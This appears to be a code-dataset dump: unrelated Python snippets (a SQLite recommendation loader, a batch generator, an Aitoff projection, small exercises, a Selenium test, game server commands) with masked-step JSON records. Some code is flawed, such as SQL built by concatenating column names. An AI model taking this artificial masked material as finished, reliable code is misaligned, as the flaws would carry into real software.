(catalog_name) VALUES (?)''',('RiteAid',))\n catalogs.append(c.lastrowid)\n\n\n ppl = []\n c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Tomer',))\n ppl.append(c.lastrowid)\n c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Alex',))\n ppl.append(c.lastrowid)\n c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Matt',))\n ppl.append(c.lastrowid)\n 
c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Rachael',))\n ppl.append(c.lastrowid)\n c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Sam',))\n ppl.append(c.lastrowid)\n c.execute('''INSERT INTO users (user_name) VALUES (?)''',('Joey',))\n ppl.append(c.lastrowid)\n\n products = []\n # Load fake products\n for i in range(1,20):\n c.execute('''INSERT INTO products (id,sku_id,catalog_id, product_name, price,description) VALUES (NULL,?,?,?,?,?)''',(randint(1,2000),catalogs[randint(0,len(catalogs)-1)],'Movie' + str(i),randint(1,2000),'Title' + str(i)))\n products.append(c.lastrowid)\n\n # Load fake transactions\n for i in range(1,50):\n c.execute('''INSERT INTO products_bought (id,user_id, product_id) VALUES (NULL,?,?)''',(ppl[randint(0,len(ppl)-1)],products[randint(0,len(products)-1)]))\n values = (c.lastrowid,device[randint(0,len(device)-1)],oses[randint(0,len(oses)-1)], times[randint(0,len(times)-1)], days[randint(0,len(days)-1)], lats[randint(0,len(lats)-1)], lons[randint(0,len(lons)-1)],randint(0,5),randint(0,30))\n c.execute('''INSERT INTO product_context (id,recommendation_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)''',values)\n\n # Load fake recommendations\n for i in range(1,1000):\n product_id = products[randint(0, len(products) - 1)]\n c.execute('''INSERT INTO recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'true')''',(ppl[randint(0,len(ppl)-1)],product_id))\n values = (c.lastrowid,product_id,device[randint(0,len(device)-1)],oses[randint(0,len(oses)-1)], times[randint(0,len(times)-1)], days[randint(0,len(days)-1)], lats[randint(0,len(lats)-1)], lons[randint(0,len(lons)-1)],randint(0,3),randint(0,3))\n c.execute('''INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES 
(NULL,?,?,?,?,?,?,?,?,?,?)''',values)\n conn.commit()\n\n\noses = ['IOS', 'Android']#, 'Windows10', 'macOS']\ndevice = ['mobile']#, 'computer']\n'''\ntimes = ['10:33 AM',\n'2:38 PM',\n'3:01 AM',\n'12:31 AM',\n'2:56 PM',\n'8:01 AM',\n'5:00 PM',\n'9:38 PM',\n'3:01 AM']\n'''\ntimes = ['morning', 'afternoon', 'night']\n\ndays = ['M']#['M', 'T', 'W', 'R', 'F', 'S', 'Su']\n\n'''\nlats = ['-149.8935557',\n'-149.9054948',\n'-149.7522',\n'-149.8643361',\n'-149.8379726',\n'-149.9092788',\n'-149.7364877',\n'-149.8211',\n'-149.8445832',\n'-149.9728678']\n'''\nlats = ['north']#, 'south']\n\n'''\nlons = ['61.21759217',\n'61.19533942',\n'61.2297',\n'61.19525062',\n'61.13751355',\n'61.13994658',\n'61.19533265',\n'61.2156',\n'61.13806145',\n'61.176693']\n'''\nlons = ['east']#, 'west']\n\n\ndef get_users(conn):\n c = conn.cursor()\n c.execute('''select * from users''')\n return c.fetchall()\n\n\ndef get_catalogs(conn):\n c = conn.cursor()\n c.execute('''select * from catalogs''')\n return c.fetchall()\n\n\ndef get_products(conn, catalog_id):\n c = conn.cursor()\n c.execute('''select * from products where catalog_id = ?''',(catalog_id,))\n return c.fetchall()\n\n\ndef get_product_by_id(conn, catalog_id, product_id):\n c = conn.cursor()\n c.execute('''SELECT * FROM products WHERE catalog_id = ? AND id = ?''',(catalog_id,product_id))\n return c.fetchall()\n\n\ndef get_products_bought(conn, catalog_id):\n c = conn.cursor()\n c.execute('''select pb.* from products_bought pb, catalogs cat, products p where pb.product_id = p.id and p.catalog_id = ?''',(catalog_id,))\n return c.fetchall()\n\n\ndef get_all_data(conn):\n c = conn.cursor()\n c.execute('''select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id''')\n return c. 
fetchall()\n\n\ndef get_data_for_user(conn,userid):\n c = conn.cursor()\n c.execute('''select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ?''',(userid,))\n return c.fetchall()\n\n\ndef get_data_for_user_and_catalog(conn, userid, catalogid):\n c = conn.cursor()\n c.execute('''select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and u.id = ? and c.id = ?''',(userid,catalogid))\n return c.fetchall()\n\n\ndef get_transactions_for_catalog(conn,catalogid):\n c = conn.cursor()\n c.execute('''select u.*, p.*, c.* from users u, products p, products_bought pb, catalogs c where p.id = pb.product_id and p.catalog_id == c.id and u.id = pb.user_id and c.id = ?''',(catalogid,))\n return c.fetchall()\n\n\ndef get_recommendations_by_user(conn,userId):\n c = conn.cursor()\n c.execute('''select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.user_id = ?''',(userId,))\n return c.fetchall()\n\n\ndef get_recommendations_by_product(conn,productId):\n c = conn.cursor()\n c.execute('''select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.product_id = ?''',(productId,))\n return c.fetchall()\n\n\ndef get_connection():\n return sqlite3.connect('recommendation_engine.db')\n\n\ndef generate_context(product_id):\n return [product_id, device[randint(0, len(device) - 1)], oses[randint(0, len(oses) - 1)],\n times[randint(0, len(times) - 1)], days[randint(0, len(days) - 1)], lats[randint(0, len(lats) - 1)],\n lons[randint(0, len(lons) - 1)], randint(0, 3), randint(0, 3)]\n\n\ndef add_recommendation(conn, product_ids,user_ids,contexts):\n ids = []\n c = conn.cursor()\n for i in range(0,len(product_ids)):\n product_id = product_ids[i]\n user_id = user_ids[i]\n context = contexts[i]\n c.execute('''INSERT INTO 
recommendations (id,user_id, product_id, interacted) VALUES (NULL,?,?,'false')''',\n (user_id, product_id))\n context.insert(0,c.lastrowid)\n ids.append(c.lastrowid)\n c.execute( '''INSERT INTO product_context (id,recommendation_id , product_id , device , os , time_of_day , day_of_week , latitude , longitude ,num_items_in_cart , purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)''',\n context)\n conn.commit()\n c.execute('select r.*, c.* from recommendations r, product_context c where r.id = c.recommendation_id and r.id in (%s)' %\n ','.join('?'*len(ids)), ids)\n return c.fetchall()\n\n\ndef get_probability(conn, x, giveny):\n c = conn.cursor()\n query = '''select count(*) from product_context where '''\n first = True\n params = []\n for key,val in x.items():\n if not first:\n query += ' and '\n else:\n first = False\n query += str(key) + '=?'\n params.append(str(val))\n c.execute(query,params)\n total = c.fetchone()[0]\n\n for key,val in giveny.items():\n query += ' and ' + str(key) + '=?'\n params.append(str(val))\n c.execute(query,params)\n smaller = c.fetchone()[0]\n if total == 0:\n return 0\n else:\n return smaller/float(total)\n\n\ndef load_test_data(conn):\n c = conn.cursor()\n\n # Clear database\n c.execute('''DELETE FROM catalogs''')\n c.execute('''DELETE FROM products''')\n c.execute('''DELETE FROM users''')\n c.execute('''DELETE FROM products_bought''')\n c.execute('''DELETE FROM product_context''')\n c.execute('''DELETE FROM recommendations''')\n\n # Initialize users\n user_names = test_data.USER_NAMES\n\n # Initialize movie names\n product_names = test_data.PRODUCT_NAMES\n\n # Initialize Prices\n prices = test_data.POSSIBLE_PRICES\n\n # Load test catalog\n catalog_ids = []\n c.execute('''INSERT INTO catalogs (catalog_name) VALUES (?)''', ('MovieDatabase',))\n catalog_ids.append(c.lastrowid)\n\n # Load test users\n user_ids = []\n for user in user_names:\n c.execute('''INSERT INTO users (user_name) VALUES (?)''', (user,))\n 
user_ids.append(c.lastrowid)\n\n # Load test products\n product_ids = []\n for product in product_names:\n values = (randint(1, 2000), catalog_ids[0], product, prices[randint(0, len(prices)-1)], 'desc')\n c.execute('''INSERT INTO products (id, sku_id, catalog_id, product_name, price, description) VALUES (NULL,?,?,?,?,?)''', values)\n product_ids.append(c.lastrowid)\n\n # Load fake transactions\n for i in range(1, 50):\n values = (user_ids[randint(0, len(user_ids)-1)], product_ids[randint(0, len(product_ids)-1)])\n c.execute('''INSERT INTO products_bought (id,user_id,product_id) VALUES (NULL,?,?)''', values)\n\n values = (c.lastrowid,\n device[randint(0, len(device) - 1)],\n oses[randint(0, len(oses) - 1)],\n times[randint(0, len(times) - 1)],\n days[randint(0, len(days) - 1)],\n lats[randint(0, len(lats) - 1)],\n lons[randint(0, len(lons) - 1)],\n randint(0, 3),\n randint(0, 3))\n c.execute('''INSERT INTO product_context (id,recommendation_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?)''', values)\n\n # Load fake recommendations\n for i in range(1, 1000):\n product_id = product_ids[randint(0, len(product_ids)-1)]\n values = (user_ids[randint(0, len(user_ids)-1)], product_id,)\n c.execute('''INSERT INTO recommendations (id,user_id,product_id,interacted) VALUES (NULL,?,?,'True')''', values)\n\n values =(c.lastrowid,\n product_id,\n device[randint(0, len(device) - 1)],\n oses[randint(0, len(oses) - 1)],\n times[randint(0, len(times) - 1)],\n days[randint(0, len(days) - 1)],\n lats[randint(0, len(lats) - 1)],\n lons[randint(0, len(lons) - 1)],\n randint(0, 3),\n randint(0, 3))\n c.execute('''INSERT INTO product_context (id,recommendation_id,product_id,device,os,time_of_day,day_of_week,latitude,longitude,num_items_in_cart,purchases_in_last_month) VALUES (NULL,?,?,?,?,?,?,?,?,?,?)''', values)\n\n conn.commit()\n\n",
"step-ids": [
9,
17,
19,
20,
21
]
}
|
[
9,
17,
19,
20,
21
] |
import itertools
import numpy as np
import pandas as pd
from scipy.sparse import coo_matrix
def merge_and_split(inputs, labels):
    """Inner-join features and labels on their shared 'utterance' index.

    Both frames are expected to be indexed by 'utterance'; only utterances
    present in both survive the join.  Returns the aligned ``feat`` and
    ``label`` columns as a pair of Series (both indexed by 'utterance').
    """
    left = inputs.reset_index()
    right = labels.reset_index()
    joined = left.merge(right, on='utterance', how='inner')
    joined = joined.set_index('utterance')
    return joined.feat, joined.label
def list_to_sparse(inputs):
    """Convert a sequence of variable-length lists into a scipy COO matrix.

    Row ``i`` of the result holds ``inputs[i]`` left-aligned; the remaining
    cells are implicit zeros.  The matrix shape is
    ``(len(inputs), max inner length)``.

    An empty ``inputs`` returns an empty ``(0, 0)`` matrix instead of
    raising (the previous ``np.max`` over an empty list would crash).
    """
    # len() (not truthiness) so numpy object arrays are also accepted.
    if len(inputs) == 0:
        return coo_matrix((0, 0))
    data = list(itertools.chain.from_iterable(inputs))
    # Row index i repeated once per element of inputs[i].
    row = list(itertools.chain.from_iterable(
        itertools.repeat(i, len(x)) for i, x in enumerate(inputs)))
    # Column indices restart at 0 for every row (left-aligned layout).
    col = list(itertools.chain.from_iterable(range(len(x)) for x in inputs))
    n_cols = max(len(x) for x in inputs)
    return coo_matrix((data, (row, col)), shape=(len(inputs), n_cols))
class BatchGenerator(object):
    """Yield shuffled, zero-padded mini-batches of variable-length sequences.

    ``data`` is a pair ``(inputs, labels)``.  Each element of ``inputs`` is a
    2-D array (time steps x feature dim); each element of ``labels`` is a
    sequence of label values handed to ``list_to_sparse``.
    NOTE(review): fancy indexing in ``_suffle`` assumes both containers are
    numpy arrays (e.g. object arrays), not plain lists — confirm callers.
    """

    def __init__(self, data, batch_size=1):
        self.inputs, self.labels = data
        self.batch_size = batch_size
        self.data_length = len(self.inputs)
        # Time steps per example; cached once for padding bookkeeping.
        self.sequence_length = np.array([x.shape[0] for x in self.inputs])

    def next_batch(self):
        """Generator over ``(inputs, labels, sequence_length)`` batches.

        Reshuffles the whole dataset once per call, then walks it in
        ``batch_size`` chunks (the last chunk may be smaller).
        """
        self._suffle()
        step = self.batch_size
        total = self.data_length
        start = 0
        while start < total:
            end = min(start + step, total)
            yield self._get(start, end)
            start = end

    def _suffle(self):
        # One permutation, applied consistently to all parallel arrays.
        order = np.random.permutation(self.data_length)
        self.inputs = self.inputs[order]
        self.labels = self.labels[order]
        self.sequence_length = self.sequence_length[order]

    def _get(self, start, end):
        seq_len = self.sequence_length[start:end]
        width = np.max(seq_len)
        # Zero-pad each example along the time axis to the batch maximum.
        padded = []
        for x in self.inputs[start:end]:
            pad = (0, width - len(x)), (0, 0)
            padded.append(np.pad(x, pad_width=pad, mode='constant'))
        inputs = np.array(padded)
        labels = list_to_sparse(self.labels[start:end])
        return inputs, labels, seq_len
|
normal
|
{
"blob_id": "912928cea0f96e601eecfcb6dba695ef26a3c6e2",
"index": 9618,
"step-1": "<mask token>\n\n\nclass BatchGenerator(object):\n\n def __init__(self, data, batch_size=1):\n self.inputs, self.labels = data\n self.batch_size = batch_size\n self.data_length = len(self.inputs)\n self.sequence_length = np.array([x.shape[0] for x in self.inputs])\n\n def next_batch(self):\n self._suffle()\n start = 0\n end = 0\n batch_size, data_length = self.batch_size, self.data_length\n while end != data_length:\n end += batch_size\n end = data_length if end >= data_length else end\n yield self._get(start, end)\n start = end\n\n def _suffle(self):\n permutation = np.random.permutation(self.data_length)\n self.inputs = self.inputs[permutation]\n self.labels = self.labels[permutation]\n self.sequence_length = self.sequence_length[permutation]\n\n def _get(self, start, end):\n sequence_length = self.sequence_length[start:end]\n batch_sequence_length = np.max(sequence_length)\n inputs = np.array([np.pad(x, pad_width=((0, batch_sequence_length -\n len(x)), (0, 0)), mode='constant') for x in self.inputs[start:end]]\n )\n labels = list_to_sparse(self.labels[start:end])\n return inputs, labels, sequence_length\n",
"step-2": "<mask token>\n\n\ndef list_to_sparse(inputs):\n \"\"\"Convert list of lists into scipy coo matrix.\n \"\"\"\n data = list(itertools.chain(*inputs))\n row = list(itertools.chain(*[itertools.repeat(i, len(x)) for i, x in\n enumerate(inputs)]))\n col = list(itertools.chain(*[range(len(x)) for x in inputs]))\n s = coo_matrix((data, (row, col)), shape=(len(inputs), np.max([len(x) for\n x in inputs])))\n return s\n\n\nclass BatchGenerator(object):\n\n def __init__(self, data, batch_size=1):\n self.inputs, self.labels = data\n self.batch_size = batch_size\n self.data_length = len(self.inputs)\n self.sequence_length = np.array([x.shape[0] for x in self.inputs])\n\n def next_batch(self):\n self._suffle()\n start = 0\n end = 0\n batch_size, data_length = self.batch_size, self.data_length\n while end != data_length:\n end += batch_size\n end = data_length if end >= data_length else end\n yield self._get(start, end)\n start = end\n\n def _suffle(self):\n permutation = np.random.permutation(self.data_length)\n self.inputs = self.inputs[permutation]\n self.labels = self.labels[permutation]\n self.sequence_length = self.sequence_length[permutation]\n\n def _get(self, start, end):\n sequence_length = self.sequence_length[start:end]\n batch_sequence_length = np.max(sequence_length)\n inputs = np.array([np.pad(x, pad_width=((0, batch_sequence_length -\n len(x)), (0, 0)), mode='constant') for x in self.inputs[start:end]]\n )\n labels = list_to_sparse(self.labels[start:end])\n return inputs, labels, sequence_length\n",
"step-3": "<mask token>\n\n\ndef merge_and_split(inputs, labels):\n df = inputs.reset_index().merge(labels.reset_index(), on='utterance',\n how='inner').set_index('utterance')\n return df.feat, df.label\n\n\ndef list_to_sparse(inputs):\n \"\"\"Convert list of lists into scipy coo matrix.\n \"\"\"\n data = list(itertools.chain(*inputs))\n row = list(itertools.chain(*[itertools.repeat(i, len(x)) for i, x in\n enumerate(inputs)]))\n col = list(itertools.chain(*[range(len(x)) for x in inputs]))\n s = coo_matrix((data, (row, col)), shape=(len(inputs), np.max([len(x) for\n x in inputs])))\n return s\n\n\nclass BatchGenerator(object):\n\n def __init__(self, data, batch_size=1):\n self.inputs, self.labels = data\n self.batch_size = batch_size\n self.data_length = len(self.inputs)\n self.sequence_length = np.array([x.shape[0] for x in self.inputs])\n\n def next_batch(self):\n self._suffle()\n start = 0\n end = 0\n batch_size, data_length = self.batch_size, self.data_length\n while end != data_length:\n end += batch_size\n end = data_length if end >= data_length else end\n yield self._get(start, end)\n start = end\n\n def _suffle(self):\n permutation = np.random.permutation(self.data_length)\n self.inputs = self.inputs[permutation]\n self.labels = self.labels[permutation]\n self.sequence_length = self.sequence_length[permutation]\n\n def _get(self, start, end):\n sequence_length = self.sequence_length[start:end]\n batch_sequence_length = np.max(sequence_length)\n inputs = np.array([np.pad(x, pad_width=((0, batch_sequence_length -\n len(x)), (0, 0)), mode='constant') for x in self.inputs[start:end]]\n )\n labels = list_to_sparse(self.labels[start:end])\n return inputs, labels, sequence_length\n",
"step-4": "import itertools\nimport numpy as np\nimport pandas as pd\nfrom scipy.sparse import coo_matrix\n\n\ndef merge_and_split(inputs, labels):\n df = inputs.reset_index().merge(labels.reset_index(), on='utterance',\n how='inner').set_index('utterance')\n return df.feat, df.label\n\n\ndef list_to_sparse(inputs):\n \"\"\"Convert list of lists into scipy coo matrix.\n \"\"\"\n data = list(itertools.chain(*inputs))\n row = list(itertools.chain(*[itertools.repeat(i, len(x)) for i, x in\n enumerate(inputs)]))\n col = list(itertools.chain(*[range(len(x)) for x in inputs]))\n s = coo_matrix((data, (row, col)), shape=(len(inputs), np.max([len(x) for\n x in inputs])))\n return s\n\n\nclass BatchGenerator(object):\n\n def __init__(self, data, batch_size=1):\n self.inputs, self.labels = data\n self.batch_size = batch_size\n self.data_length = len(self.inputs)\n self.sequence_length = np.array([x.shape[0] for x in self.inputs])\n\n def next_batch(self):\n self._suffle()\n start = 0\n end = 0\n batch_size, data_length = self.batch_size, self.data_length\n while end != data_length:\n end += batch_size\n end = data_length if end >= data_length else end\n yield self._get(start, end)\n start = end\n\n def _suffle(self):\n permutation = np.random.permutation(self.data_length)\n self.inputs = self.inputs[permutation]\n self.labels = self.labels[permutation]\n self.sequence_length = self.sequence_length[permutation]\n\n def _get(self, start, end):\n sequence_length = self.sequence_length[start:end]\n batch_sequence_length = np.max(sequence_length)\n inputs = np.array([np.pad(x, pad_width=((0, batch_sequence_length -\n len(x)), (0, 0)), mode='constant') for x in self.inputs[start:end]]\n )\n labels = list_to_sparse(self.labels[start:end])\n return inputs, labels, sequence_length\n",
"step-5": null,
"step-ids": [
5,
6,
7,
8
]
}
|
[
5,
6,
7,
8
] |
# aitoff projection
# see:
# https://en.wikipedia.org/wiki/Aitoff_projection
def aitoff_projection(theta, phi):
    """Map spherical angles (radians) to 2-D map coordinates.

    ``theta`` is shifted from [0, 2*pi] onto [-pi, pi]; the returned ``x``
    lies in [0, 360] and ``y`` in [-90, 90].  Works on scalars or numpy
    arrays thanks to the numpy ufuncs.
    NOTE(review): the sqrt denominator matches the Hammer-projection form
    rather than the sinc-based Aitoff formula — confirm this is intended.
    """
    import numpy as np
    lon = theta - np.pi            # recentre longitude on zero
    half = lon / 2
    cphi = np.cos(phi)
    scale = np.sqrt(1 + cphi * np.cos(half))
    x = 180 * cphi * np.sin(half) / scale + 180
    y = 90 * np.sin(phi) / scale
    return x, y
|
normal
|
{
"blob_id": "0dcf90514543a1ca801e82cd402b3e1002b1f5d0",
"index": 9262,
"step-1": "<mask token>\n",
"step-2": "def aitoff_projection(theta, phi):\n import numpy as np\n theta = theta - np.pi\n cos_phi = np.cos(phi)\n denom = np.sqrt(1 + cos_phi * np.cos(theta / 2))\n x = 180 * cos_phi * np.sin(theta / 2) / denom\n x = x + 180\n y = 90 * np.sin(phi) / denom\n return x, y\n",
"step-3": "# aitoff projection\n# see:\n# https://en.wikipedia.org/wiki/Aitoff_projection\ndef aitoff_projection(theta, phi):\n import numpy as np\n # theta, phi in radian\n theta = theta - np.pi\n cos_phi = np.cos(phi)\n denom = np.sqrt(1 + cos_phi * np.cos(theta/2))\n x = 180 * cos_phi * np.sin(theta/2) / denom\n x = x + 180\n y = 90 * np.sin(phi) / denom\n return x,y\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in a:
for j in b:
for k in c:
if i + k + j == 1000 and i < j < k and j ** 2 + i ** 2 == k ** 2:
print(i)
print(j)
print(k)
break
<|reserved_special_token_1|>
a = list(range(1, 501))
b = list(range(1, 501))
c = list(range(1, 501))
for i in a:
for j in b:
for k in c:
if i + k + j == 1000 and i < j < k and j ** 2 + i ** 2 == k ** 2:
print(i)
print(j)
print(k)
break
|
flexible
|
{
"blob_id": "34947b7ed300f2cbcbf9042fee3902458921d603",
"index": 2912,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in a:\n for j in b:\n for k in c:\n if i + k + j == 1000 and i < j < k and j ** 2 + i ** 2 == k ** 2:\n print(i)\n print(j)\n print(k)\n break\n",
"step-3": "a = list(range(1, 501))\nb = list(range(1, 501))\nc = list(range(1, 501))\nfor i in a:\n for j in b:\n for k in c:\n if i + k + j == 1000 and i < j < k and j ** 2 + i ** 2 == k ** 2:\n print(i)\n print(j)\n print(k)\n break\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import time
from tests.test_base import BaseTest
from pages.campo_de_treinamento_page import CampoDeTreinamentoPage
class TestCadastro(BaseTest):
    """UI test for the "Campo de Treinamento" registration form."""
    def test_cadastro_com_sucesso(self):
        """Fill in name, surname and male gender, then submit the form.

        NOTE(review): no assertion follows the submit -- presumably the page
        object raises on failure; confirm, or add an explicit result check.
        """
        self.campoDeTreinamento = CampoDeTreinamentoPage(self.driver)
        self.campoDeTreinamento.fill_name("Everton")
        self.campoDeTreinamento.fill_sobrenome("Araujo")
        self.campoDeTreinamento.select_sexo_masculino()
        self.campoDeTreinamento.cadastra()
        time.sleep(3)  # fixed wait after submit; TODO replace with an explicit wait
|
normal
|
{
"blob_id": "4e50a7a757bacb04dc8f292bdaafb03c86042e6c",
"index": 1633,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestCadastro(BaseTest):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass TestCadastro(BaseTest):\n\n def test_cadastro_com_sucesso(self):\n self.campoDeTreinamento = CampoDeTreinamentoPage(self.driver)\n self.campoDeTreinamento.fill_name('Everton')\n self.campoDeTreinamento.fill_sobrenome('Araujo')\n self.campoDeTreinamento.select_sexo_masculino()\n self.campoDeTreinamento.cadastra()\n time.sleep(3)\n",
"step-4": "import time\nfrom tests.test_base import BaseTest\nfrom pages.campo_de_treinamento_page import CampoDeTreinamentoPage\n\n\nclass TestCadastro(BaseTest):\n\n def test_cadastro_com_sucesso(self):\n self.campoDeTreinamento = CampoDeTreinamentoPage(self.driver)\n self.campoDeTreinamento.fill_name('Everton')\n self.campoDeTreinamento.fill_sobrenome('Araujo')\n self.campoDeTreinamento.select_sexo_masculino()\n self.campoDeTreinamento.cadastra()\n time.sleep(3)\n",
"step-5": "import time\nfrom tests.test_base import BaseTest\nfrom pages.campo_de_treinamento_page import CampoDeTreinamentoPage\n\n\nclass TestCadastro(BaseTest):\n def test_cadastro_com_sucesso(self):\n self.campoDeTreinamento = CampoDeTreinamentoPage(self.driver)\n self.campoDeTreinamento.fill_name(\"Everton\")\n self.campoDeTreinamento.fill_sobrenome(\"Araujo\")\n self.campoDeTreinamento.select_sexo_masculino()\n self.campoDeTreinamento.cadastra()\n time.sleep(3)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for x in range(1, 5):
for y in range(1, 5):
for z in range(1, 5):
if (x != y) & (x != z) & (y != z):
print(x, y, z)
<|reserved_special_token_1|>
''' 简述:这里有四个数字,分别是:1、2、3、4
提问:能组成多少个互不相同且无重复数字的三位数?各是多少? '''
for x in range(1,5):
for y in range(1,5):
for z in range(1,5):
if (x != y) & (x != z) & (y != z):
print(x,y,z)
|
flexible
|
{
"blob_id": "caac877bf6c42217ea41f51717f6a704a3a9774b",
"index": 6838,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor x in range(1, 5):\n for y in range(1, 5):\n for z in range(1, 5):\n if (x != y) & (x != z) & (y != z):\n print(x, y, z)\n",
"step-3": "''' 简述:这里有四个数字,分别是:1、2、3、4\n提问:能组成多少个互不相同且无重复数字的三位数?各是多少? '''\n\nfor x in range(1,5):\n for y in range(1,5):\n for z in range(1,5):\n if (x != y) & (x != z) & (y != z):\n print(x,y,z)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from __future__ import annotations
import math
from abc import abstractmethod
from pytown_core.patterns.behavioral import Command
from pytown_core.serializers import IJSONSerializable
from .buildings import BuildingProcess, BuildingTransaction
from .buildings.factory import BuildingFactory
from .check import (
AvailableCheck,
AwakenCheck,
BackgroundBuildCheck,
BackgroundMovementCheck,
CheckResult,
EnergyCheck,
InventoryAddCheck,
InventoryRemoveCheck,
TransactionCheck,
)
from .inventory import Item
class ServerCommand(IJSONSerializable, Command):
    """Abstract base for every player-issued command executed server-side.

    Subclasses implement ``_check`` (validate against the town state,
    accumulating failure reasons into ``self.check_result``) and ``_do``
    (apply the state change).  ``execute`` runs the check first and applies
    the change only when the check passed.
    """
    def __init__(self):
        # Id of the issuing client; filled in by CommandsFactory.
        self.client_id = None
        self.town = None  # TODO: will be set by townmanager
        # Truthy when all checks passed; accumulates "+=" failure messages.
        self.check_result = CheckResult()
    def execute(self):
        """Validate the command, then apply it only if validation succeeded."""
        self._check()
        if self.check_result:
            self._do()
    @abstractmethod
    def _check(self):
        # Populate self.check_result with any reason the command must not run.
        raise NotImplementedError
    @abstractmethod
    def _do(self):
        # Apply the command's effect on the town; called only after a passing check.
        raise NotImplementedError
    @abstractmethod
    def __repr__(self):
        pass
    @classmethod
    @abstractmethod
    def from_json_dict(cls, json_dict) -> ServerCommand:
        # Rebuild a concrete command from its JSON representation.
        raise NotImplementedError
    def to_json_dict(self) -> dict:
        """Serialize the command-independent fields; subclasses extend this."""
        json_dict = {}
        json_dict["client_id"] = self.client_id
        json_dict["check_result"] = self.check_result.to_json_dict()
        return json_dict
    def to_podsixnet(self):
        """Return the JSON dict tagged for the podsixnet network layer."""
        podsixnet_dict = self.to_json_dict()
        podsixnet_dict["action"] = "command"
        return podsixnet_dict
class MovePlayerCommand(ServerCommand):
    """Move the issuing player one step in a cardinal direction.

    The step size is the player's ``velocity`` scaled by the
    ``move_multiplicator`` of the background tile the player currently
    stands on, so coordinates are fractional.
    """
    # Energy drained from the player for every successful move.
    ENERGY_COST = 1
    def __init__(self, direction: str):
        # direction is one of "left" / "right" / "up" / "down".
        ServerCommand.__init__(self)
        self._direction = direction
    def __repr__(self):
        msg = "Move ServerCommand : {}".format(self._direction)
        if not self.check_result:
            msg += "\n{}".format(self.check_result)
        return msg
    def _check(self):
        """Fail when energy is insufficient, the player is unavailable, or a
        destination corner tile is off-map or rejects movement."""
        player = self.town.get_player(self.client_id)
        EnergyCheck(player, MovePlayerCommand.ENERGY_COST).check(self.check_result)
        AvailableCheck(player).check(self.check_result)
        # All four corners of the player's destination bounding box must lie
        # on known background tiles that allow movement.
        for tile in self._get_tiles_coordinates_dict().values():
            if tile not in self.town.backgrounds.keys():
                self.check_result += "tile {} not in town".format(tile)
                return
            BackgroundMovementCheck(self.town.backgrounds[tile], player).check(
                self.check_result
            )
    def _do(self):
        # Pay the energy cost and commit the new fractional position.
        (x_dest, y_dest) = self.tile_dest
        player = self.town.get_player(self.client_id)
        player.status = "move"
        player.direction = self._direction
        player.energy.value -= MovePlayerCommand.ENERGY_COST
        player.x = x_dest
        player.y = y_dest
    @property
    def tile_dest(self) -> tuple:
        """(x, y) position the player would reach with this move."""
        movement_matrix = {}
        movement_matrix["left"] = (-1, 0)
        movement_matrix["right"] = (+1, 0)
        movement_matrix["up"] = (0, -1)
        movement_matrix["down"] = (0, +1)
        player = self.town.get_player(self.client_id)
        tile = self.town.get_player_tile(self.client_id)
        # The multiplicator of the tile the player is leaving scales the step.
        background = self.town.backgrounds[tile]
        bg_multiplicator = background.move_multiplicator
        x_dest = (
            player.x
            + movement_matrix[self._direction][0] * bg_multiplicator * player.velocity
        )
        y_dest = (
            player.y
            + movement_matrix[self._direction][1] * bg_multiplicator * player.velocity
        )
        return (x_dest, y_dest)
    def _get_tiles_coordinates_dict(self):
        """Integer tile coordinates of the four corners of the destination
        bounding box (the 0.99 offset keeps a box flush against the next
        tile from counting as inside it)."""
        (x_dest, y_dest) = self.tile_dest
        tiles_coordinates_dict = {
            "topleft": (math.floor(x_dest), math.floor(y_dest)),
            "topright": (math.floor(x_dest + 0.99), math.floor(y_dest)),
            "bottomleft": (math.floor(x_dest), math.floor(y_dest + 0.99)),
            "bottomright": (math.floor(x_dest + 0.99), math.floor(y_dest + 0.99)),
        }
        return tiles_coordinates_dict
    @classmethod
    def from_json_dict(cls, json_dict) -> MovePlayerCommand:
        return cls(json_dict["direction"])
    def to_json_dict(self):
        json_dict = super().to_json_dict()
        json_dict["command"] = "move"
        json_dict["direction"] = self._direction
        return json_dict
class BuildCommand(ServerCommand):
    """Erect a named building on a given tile of the town."""

    def __init__(self, tile: tuple, building_name: str):
        ServerCommand.__init__(self)
        self._tile = tile
        self._building_name = building_name

    def _check(self):
        # The issuing player must be in a state that allows acting.
        issuer = self.town.get_player(self.client_id)
        AvailableCheck(issuer).check(self.check_result)
        if self._tile not in self.town.backgrounds:
            self.check_result += f"tile {self._tile} not in town"
            return
        # The terrain must accept this kind of building.
        BackgroundBuildCheck(
            self.town.backgrounds[self._tile], self._building_name
        ).check(self.check_result)
